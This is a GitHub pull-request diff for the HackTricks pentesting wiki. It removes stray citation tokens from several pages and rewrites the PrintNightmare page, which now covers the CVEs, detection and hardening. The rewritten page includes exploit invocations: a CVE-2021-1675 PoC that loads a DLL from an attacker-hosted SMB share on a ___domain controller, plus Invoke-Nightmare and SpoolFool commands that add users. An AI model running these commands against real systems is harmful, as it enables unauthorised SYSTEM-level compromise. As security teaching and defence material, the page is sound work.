Skip to content

Research Update Enhanced src/windows-hardening/active-direct... #1105

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -61,15 +61,15 @@ Java.perform(function () {
});
});
```
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. ξˆ€citeξˆ‚turn5search2ξˆ‚turn5search0
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.

---

### Recent vulnerabilities worth hunting for in APKs

| Year | CVE | Affected library | Notes |
|------|-----|------------------|-------|
|2023|CVE-2023-4863|`libwebp` ≀ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| ξˆ€citeξˆ‚turn2search0|
|2023|CVE-2023-4863|`libwebp` ≀ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
|2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|

When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
Expand All @@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their

### References

- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) ξˆ€citeξˆ‚turn5search0
- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) ξˆ€citeξˆ‚turn2search0
- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)
- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)

{{#include ../../banners/hacktricks-training.md}}
Original file line number Diff line number Diff line change
Expand Up @@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth

### Automated dynamic analysis with MobSF (no jailbreak)

[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:

```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest
Expand Down
4 changes: 2 additions & 2 deletions src/pentesting-web/sql-injection/ms-access-sql-injection.md
Original file line number Diff line number Diff line change
Expand Up @@ -141,7 +141,7 @@ Point the UNC path to:
* a host that drops the TCP handshake after `SYN-ACK`
* a firewall sinkhole

The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. ξˆ€citeξˆ‚turn1search0
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984.

### Other Interesting functions

Expand Down Expand Up @@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
* Block outbound SMB/WebDAV at the network boundary.
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.

The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. ξˆ€citeξˆ‚turn0search0
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent.

### .mdb Password Cracker

Expand Down
102 changes: 99 additions & 3 deletions src/windows-hardening/active-directory-methodology/printnightmare.md
Original file line number Diff line number Diff line change
@@ -1,10 +1,106 @@
# PrintNightmare
# PrintNightmare (Windows Print Spooler RCE/LPE)

{{#include ../../banners/hacktricks-training.md}}

**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
> PrintNightmare is the collective name given to a family of vulnerabilities in the Windows **Print Spooler** service that allow **arbitrary code execution as SYSTEM** and, when the spooler is reachable over RPC, **remote code execution (RCE) on ___domain controllers and file servers**. The most-widely exploited CVEs are **CVE-2021-1675** (initially classed as LPE) and **CVE-2021-34527** (full RCE). Subsequent issues such as **CVE-2021-34481 (β€œPoint & Print”)** and **CVE-2022-21999 (β€œSpoolFool”)** prove that the attack surface is still far from closed.

{{#include ../../banners/hacktricks-training.md}}
---

## 1. Vulnerable components & CVEs

| Year | CVE | Short name | Primitive | Notes |
|------|-----|------------|-----------|-------|
|2021|CVE-2021-1675|β€œPrintNightmare #1”|LPE|Patched in June 2021 CU but bypassed by CVE-2021-34527|
|2021|CVE-2021-34527|β€œPrintNightmare”|RCE/LPE|AddPrinterDriverEx allows authenticated users to load a driver DLL from a remote share|
|2021|CVE-2021-34481|β€œPoint & Print”|LPE|Unsigned driver installation by non-admin users|
|2022|CVE-2022-21999|β€œSpoolFool”|LPE|Arbitrary directory creation β†’ DLL planting – works after 2021 patches|

All of them abuse one of the **MS-RPRN / MS-PAR RPC methods** (`RpcAddPrinterDriver`, `RpcAddPrinterDriverEx`, `RpcAsyncAddPrinterDriver`) or trust relationships inside **Point & Print**.

## 2. Exploitation techniques

### 2.1 Remote Domain Controller compromise (CVE-2021-34527)

An authenticated but **non-privileged** ___domain user can run arbitrary DLLs as **NT AUTHORITY\SYSTEM** on a remote spooler (often the DC) by:

```powershell
# 1. Host malicious driver DLL on a share the victim can reach
impacket-smbserver share ./evil_driver/ -smb2support

# 2. Use a PoC to call RpcAddPrinterDriverEx
python3 CVE-2021-1675.py victim_DC.___domain.local 'DOMAIN/user:Password!' \
-f \
'\\attacker_IP\share\evil.dll'
```

Popular PoCs include **CVE-2021-1675.py** (Python/Impacket), **SharpPrintNightmare.exe** (C#) and Benjamin Delpy’s `misc::printnightmare / lsa::addsid` modules in **mimikatz**.

### 2.2 Local privilege escalation (any supported Windows, 2021-2024)

The same API can be called **locally** to load a driver from `C:\Windows\System32\spool\drivers\x64\3\` and achieve SYSTEM privileges:

```powershell
Import-Module .\Invoke-Nightmare.ps1
Invoke-Nightmare -NewUser hacker -NewPassword P@ssw0rd!
```

### 2.3 SpoolFool (CVE-2022-21999) – bypassing 2021 fixes

Microsoft’s 2021 patches blocked remote driver loading but **did not harden directory permissions**. SpoolFool abuses the `SpoolDirectory` parameter to create an arbitrary directory under `C:\Windows\System32\spool\drivers\`, drops a payload DLL, and forces the spooler to load it:

```powershell
# Binary version (local exploit)
SpoolFool.exe -dll add_user.dll

# PowerShell wrapper
Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll
```

> The exploit works on fully-patched Windows 7 β†’ Windows 11 and Server 2012R2 β†’ 2022 before February 2022 updates

---

## 3. Detection & hunting

* **Event Logs** – enable the *Microsoft-Windows-PrintService/Operational* and *Admin* channels and watch for **Event ID 808** β€œThe print spooler failed to load a plug-in module” or for **RpcAddPrinterDriverEx** messages.
* **Sysmon** – `Event ID 7` (Image loaded) or `11/23` (File write/delete) inside `C:\Windows\System32\spool\drivers\*` when the parent process is **spoolsv.exe**.
* **Process lineage** – alerts whenever **spoolsv.exe** spawns `cmd.exe`, `rundll32.exe`, PowerShell or any unsigned binary .

## 4. Mitigation & hardening

1. **Patch!** – Apply the latest cumulative update on every Windows host that has the Print Spooler service installed.
2. **Disable the spooler where it is not required**, especially on Domain Controllers:
```powershell
Stop-Service Spooler -Force
Set-Service Spooler -StartupType Disabled
```
3. **Block remote connections** while still allowing local printing – Group Policy: `Computer Configuration β†’ Administrative Templates β†’ Printers β†’ Allow Print Spooler to accept client connections = Disabled`.
4. **Restrict Point & Print** so only administrators can add drivers by setting the registry value:
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \
/v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f
```
Detailed guidance in Microsoft KB5005652

---

## 5. Related research / tools

* [mimikatz `printnightmare`](https://github.com/gentilkiwi/mimikatz/tree/master/modules) modules
* SharpPrintNightmare (C#) / Invoke-Nightmare (PowerShell)
* SpoolFool exploit & write-up
* 0patch micropatches for SpoolFool and other spooler bugs

---

**More reading (external):** Check the 2024 walk-through blog post – [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)

{{#include ../../banners/hacktricks-training.md}}

## References

* Microsoft – *KB5005652: Manage new Point & Print default driver installation behavior*
<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>
* Oliver Lyak – *SpoolFool: CVE-2022-21999*
<https://github.com/ly4k/SpoolFool>
{{#include /banners/hacktricks-training.md}}